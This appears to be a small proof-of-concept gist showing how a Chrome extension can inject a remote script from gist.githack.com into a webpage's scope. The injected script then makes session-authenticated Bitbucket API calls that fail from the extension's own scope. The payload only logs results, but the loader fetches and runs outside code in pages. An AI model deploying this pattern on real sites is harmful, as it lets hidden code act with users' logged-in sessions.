Chrome Extension XSS

embedScript.js

alert('Hello, World!');
console.log({
  $: $,
  chrome: chrome,
  extension: chrome.extension
});
// this call requires session (or OAuth) authentication
// It MUST be run within the actual webpage's scope, not from the extensions scope
// =====
// This will succeed because this scope is being injected into the pages JS scope
// via a DOM script tag.
$.get('https://api.bitbucket.org/2.0/repositories?src=xss')
.then(function(data, status, xhr) {
  console.log({
    data: data,
    status: status,
    xhr: xhr
  });
})

inject.js

import axios from 'axios';

window.addEventListener('load', () => {
  const jqueryDOM = document.createElement('script');
  jqueryDOM.onload = () => {
    const scriptDOM = document.createElement('script');
    scriptDOM.src = 'https://gist.githack.com/david-bc/bf0b02cd27f29ab781a96f1e75f6c825/raw/980efd7773c7b159232dd1652fd37d7f01ceba40/testing.js';
    document.body.appendChild(scriptDOM);
    console.log({ $: $ });
  }
  jqueryDOM.src = 'https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js';
  document.body.appendChild(jqueryDOM);
});

// this call requires session (or OAuth) authentication
// It MUST be run within the actual webpage's scope, not from the extensions scope
// =====
// This will fail because it is being run from the chrome extension's js scope:
// `Origin 'chrome-extension://gnpeofnackdfechiomlopkcjihpafoil'`
axios.get(`https://api.bitbucket.org/2.0/repositories?src=ext`)
.then((res) => {
  console.log({ res });
})